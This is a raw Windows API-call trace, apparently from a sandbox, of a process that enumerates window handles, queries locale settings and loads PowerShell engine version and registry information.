	[0464.833] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xf74
	[0464.833] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xf08
	[0464.833] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xf0c
	[0464.833] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xed8
	[0464.833] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe90
	[0464.833] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xea8
	[0464.833] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xfa8
	[0464.833] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xfbc
	[0464.833] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xfb8
	[0464.834] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xfb4
	[0464.834] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xfb0
	[0464.834] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xfac
	[0464.834] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xfc0
	[0464.834] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xfd0
	[0464.834] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xf88
	[0464.834] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xf84
	[0464.834] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xf80
	[0464.834] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xde0
	[0464.834] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xddc
	[0464.834] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xdd8
	[0464.835] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xd34
	[0464.835] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xd10
	[0464.835] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xd0c
	[0464.835] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xc9c
	[0464.835] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xc74
	[0464.835] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xc1c
	[0464.835] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xc08
	[0464.835] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xabc
	[0464.835] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x24c
	[0464.835] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xbb0
	[0464.836] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xbfc
	[0464.836] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb10
	[0464.836] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x374
	[0464.836] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x368
	[0464.836] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb28
	[0464.836] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xae8
	[0466.818] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb14
	[0467.707] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x95c
	[0468.222] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xa8c
	[0468.738] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x46c
	[0469.210] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb3c
	[0469.331] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xa90
	[0470.188] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xad0
	[0470.190] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xa9c
	[0470.780] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xaa0
	[0470.781] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb1c
	[0471.235] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x7e0
	[0471.235] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xa74
	[0471.235] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x694
	[0471.235] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xa28
	[0471.235] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x9b0
	[0471.235] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x8d8
	[0471.236] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x940
	[0471.236] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x93c
	[0471.236] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4ec
	[0471.236] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x150
	[0471.236] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x720
	[0471.236] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x3c4
	[0471.236] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x7d4
	[0471.236] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x6c8
	[0471.236] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb54
	[0471.236] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb54
	[0471.236] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb5c
	[0471.237] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x838
	[0471.237] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x818
	[0471.237] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x5b8
	[0471.237] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x494
	[0471.237] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1ec
	[0471.237] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x440
	[0471.237] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x7e8
	[0471.237] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x730
	[0471.237] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x2c8
	[0471.237] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x31c
	[0471.237] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x330
	[0471.238] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x128
	[0471.238] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x5c8
	[0471.238] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x6f8
	[0471.238] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x358
	[0471.238] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x73c
	[0471.238] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb0
	[0471.238] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x250
	[0471.238] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x240
	[0471.238] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x790
	[0471.238] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x61c
	[0471.238] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x568
	[0471.239] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x538
	[0471.239] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x540
	[0471.239] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x460
	[0471.239] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x79c
	[0471.239] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4e0
	[0471.239] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x460
	[0471.239] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x778
	[0471.243] WerSetFlags () returned 0x0
	[0471.251] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0471.251] CoTaskMemFree (pv=0x0) 
	[0471.252] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dc08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dc00 | out: pulNumLanguages=0x12dc08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dc00) returned 1
	[0471.252] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dc08, pwszLanguagesBuffer=0x2c90eb0, pcchLanguagesBuffer=0x12dc00 | out: pulNumLanguages=0x12dc08, pwszLanguagesBuffer=0x2c90eb0, pcchLanguagesBuffer=0x12dc00) returned 1
	[0471.258] CoTaskMemAlloc (cb=0x24) returned 0x3a80a0
	[0471.258] GetUserDefaultLocaleName (in: lpLocaleName=0x3a80a0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0471.258] CoTaskMemFree (pv=0x3a80a0) 
	[0472.670] CoTaskMemAlloc (cb=0x104) returned 0x3b1e20
	[0472.670] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0472.670] CoTaskMemFree (pv=0x3b1e20) 
	[0472.672] CoTaskMemAlloc (cb=0x104) returned 0x3b1e20
	[0472.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0472.673] CoTaskMemFree (pv=0x3b1e20) 
	[0472.675] CoTaskMemAlloc (cb=0x104) returned 0x3b1e20
	[0472.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0472.675] CoTaskMemFree (pv=0x3b1e20) 
	[0472.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0472.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0472.685] SetErrorMode (uMode=0x1) returned 0x1
	[0472.685] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12d880 | out: lpFileInformation=0x12d880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0472.686] SetErrorMode (uMode=0x1) returned 0x1
	[0472.686] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12daf0 | out: lpdwHandle=0x12daf0) returned 0x94c
	[0472.687] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c94740 | out: lpData=0x2c94740) returned 1
	[0472.688] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12da68, puLen=0x12da60 | out: lplpBuffer=0x12da68*=0x2c947dc, puLen=0x12da60) returned 1
	[0472.688] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12d9d8, puLen=0x12d9d0 | out: lplpBuffer=0x12d9d8*=0x2c948b8, puLen=0x12d9d0) returned 1
	[0472.688] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0472.688] CoTaskMemAlloc (cb=0x2e) returned 0x3a94a0
	[0472.688] lstrcpyW (in: lpString1=0x3a94a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0472.688] CoTaskMemFree (pv=0x3a94a0) 
	[0472.688] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12d9d8, puLen=0x12d9d0 | out: lplpBuffer=0x12d9d8*=0x2c9490c, puLen=0x12d9d0) returned 1
	[0472.688] lstrlenW (lpString="System.Management.Automation") returned 28
	[0472.688] CoTaskMemAlloc (cb=0x3c) returned 0x3b0950
	[0472.688] lstrcpyW (in: lpString1=0x3b0950, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0472.688] CoTaskMemFree (pv=0x3b0950) 
	[0472.688] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12d9d8, puLen=0x12d9d0 | out: lplpBuffer=0x12d9d8*=0x2c94968, puLen=0x12d9d0) returned 1
	[0472.688] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0472.688] CoTaskMemAlloc (cb=0x20) returned 0x3adfc0
	[0472.688] lstrcpyW (in: lpString1=0x3adfc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0472.688] CoTaskMemFree (pv=0x3adfc0) 
	[0472.688] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12d9d8, puLen=0x12d9d0 | out: lplpBuffer=0x12d9d8*=0x2c949a8, puLen=0x12d9d0) returned 1
	[0472.689] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0472.689] CoTaskMemAlloc (cb=0x44) returned 0x3b0950
	[0472.689] lstrcpyW (in: lpString1=0x3b0950, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0472.689] CoTaskMemFree (pv=0x3b0950) 
	[0472.689] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12d9d8, puLen=0x12d9d0 | out: lplpBuffer=0x12d9d8*=0x2c94a10, puLen=0x12d9d0) returned 1
	[0472.689] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0472.689] CoTaskMemAlloc (cb=0x76) returned 0x354ad0
	[0472.689] lstrcpyW (in: lpString1=0x354ad0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0472.689] CoTaskMemFree (pv=0x354ad0) 
	[0472.689] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12d9d8, puLen=0x12d9d0 | out: lplpBuffer=0x12d9d8*=0x2c94aac, puLen=0x12d9d0) returned 1
	[0472.689] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0472.689] CoTaskMemAlloc (cb=0x44) returned 0x3b0950
	[0472.689] lstrcpyW (in: lpString1=0x3b0950, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0472.689] CoTaskMemFree (pv=0x3b0950) 
	[0472.689] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12d9d8, puLen=0x12d9d0 | out: lplpBuffer=0x12d9d8*=0x2c94b10, puLen=0x12d9d0) returned 1
	[0472.689] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0472.689] CoTaskMemAlloc (cb=0x58) returned 0x305f30
	[0472.689] lstrcpyW (in: lpString1=0x305f30, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0472.689] CoTaskMemFree (pv=0x305f30) 
	[0472.689] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12d9d8, puLen=0x12d9d0 | out: lplpBuffer=0x12d9d8*=0x2c94b8c, puLen=0x12d9d0) returned 1
	[0472.689] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0472.689] CoTaskMemAlloc (cb=0x20) returned 0x3adfc0
	[0472.689] lstrcpyW (in: lpString1=0x3adfc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0472.690] CoTaskMemFree (pv=0x3adfc0) 
	[0472.690] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12d9d8, puLen=0x12d9d0 | out: lplpBuffer=0x12d9d8*=0x2c94834, puLen=0x12d9d0) returned 1
	[0472.690] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0472.690] CoTaskMemAlloc (cb=0x66) returned 0x3ad1f0
	[0472.690] lstrcpyW (in: lpString1=0x3ad1f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0472.690] CoTaskMemFree (pv=0x3ad1f0) 
	[0472.690] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12d9d8, puLen=0x12d9d0 | out: lplpBuffer=0x12d9d8*=0x0, puLen=0x12d9d0) returned 0
	[0472.690] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12d9d8, puLen=0x12d9d0 | out: lplpBuffer=0x12d9d8*=0x0, puLen=0x12d9d0) returned 0
	[0472.690] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12d9d8, puLen=0x12d9d0 | out: lplpBuffer=0x12d9d8*=0x0, puLen=0x12d9d0) returned 0
	[0472.690] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12d9a8, puLen=0x12d9a0 | out: lplpBuffer=0x12d9a8*=0x2c947dc, puLen=0x12d9a0) returned 1
	[0472.690] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0472.690] VerLanguageNameW (in: wLang=0x0, szLang=0x34c760, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0472.690] CoTaskMemFree (pv=0x34c760) 
	[0472.690] VerQueryValueW (in: pBlock=0x2c94740, lpSubBlock="\\", lplpBuffer=0x12d9f8, puLen=0x12d9f0 | out: lplpBuffer=0x12d9f8*=0x2c94768, puLen=0x12d9f0) returned 1
	[0472.699] CoTaskMemAlloc (cb=0x104) returned 0x3b1e20
	[0472.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0472.699] CoTaskMemFree (pv=0x3b1e20) 
	[0472.704] CoTaskMemAlloc (cb=0x104) returned 0x3b1e20
	[0472.704] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0472.704] CoTaskMemFree (pv=0x3b1e20) 
	[0472.708] lstrlenW (lpString="䅁") returned 1
	[0473.934] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d8c8 | out: phkResult=0x12d8c8*=0x2f8) returned 0x0
	[0473.935] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d8b8 | out: phkResult=0x12d8b8*=0x2fc) returned 0x0
	[0473.935] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d948 | out: phkResult=0x12d948*=0x300) returned 0x0
	[0473.940] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d88c, lpData=0x0, lpcbData=0x12d888*=0x0 | out: lpType=0x12d88c*=0x1, lpData=0x0, lpcbData=0x12d888*=0x56) returned 0x0
	[0473.941] CoTaskMemAlloc (cb=0x5a) returned 0x3ad180
	[0473.941] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d85c, lpData=0x3ad180, lpcbData=0x12d858*=0x56 | out: lpType=0x12d85c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d858*=0x56) returned 0x0
	[0473.941] CoTaskMemFree (pv=0x3ad180) 
	[0473.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0473.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0473.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0474.867] CoTaskMemAlloc (cb=0x104) returned 0x3af1d0
